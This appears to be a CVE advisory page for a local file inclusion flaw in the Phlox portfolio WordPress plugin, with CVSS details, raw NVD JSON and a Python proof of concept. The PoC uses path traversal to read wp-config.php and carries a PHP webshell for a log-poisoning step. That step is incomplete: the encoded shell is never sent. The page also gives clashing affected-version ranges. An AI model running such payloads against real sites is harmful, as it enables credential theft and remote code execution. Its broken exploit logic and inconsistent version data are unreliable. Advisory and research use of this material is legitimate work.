Security Vulnerability Report
中文
CVE-2025-12497 CVSS 8.1 HIGH

CVE-2025-12497

Published: 2025-11-05 12:15:33
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Premium Portfolio Features for Phlox theme plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.3.10 via the 'args[extra_template_path]' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary .php files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where .php file types can be uploaded and included.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Premium Portfolio Features for Phlox < 2.3.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import base64 # CVE-2025-12497 LFI PoC # Target: Premium Portfolio Features for Phlox theme plugin # Vulnerability: Local File Inclusion via args[extra_template_path] target_url = "http://target-wordpress-site.com/" # Step 1: Read sensitive file (wp-config.php) print("[*] Testing LFI vulnerability...") lfi_payload = "../../../../wp-config.php" params = { "args[extra_template_path]": lfi_payload } try: response = requests.get(target_url, params=params, timeout=10) if "DB_NAME" in response.text or "define" in response.text: print("[+] LFI confirmed! Sensitive file contents retrieved.") print(response.text[:500]) except requests.RequestException as e: print(f"[-] Request failed: {e}") # Step 2: Try to execute code via log poisoning # Encode webshell in base64 to bypass filters webshell = "<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>" encoded_webshell = base64.b64encode(webshell.encode()).decode() log_poison_payload = f"../../../../../../var/log/apache2/access.log" params_poison = { "args[extra_template_path]": log_poison_payload } print(f"[*] Attempting log poisoning with encoded shell: {encoded_webshell[:30]}...")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12497", "sourceIdentifier": "[email protected]", "published": "2025-11-05T12:15:33.347", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Premium Portfolio Features for Phlox theme plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.3.10 via the 'args[extra_template_path]' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary .php files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where .php file types can be uploaded and included."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3388727/auxin-portfolio", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/518abad2-d3cc-4d15-83d2-8fd99d30500c?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.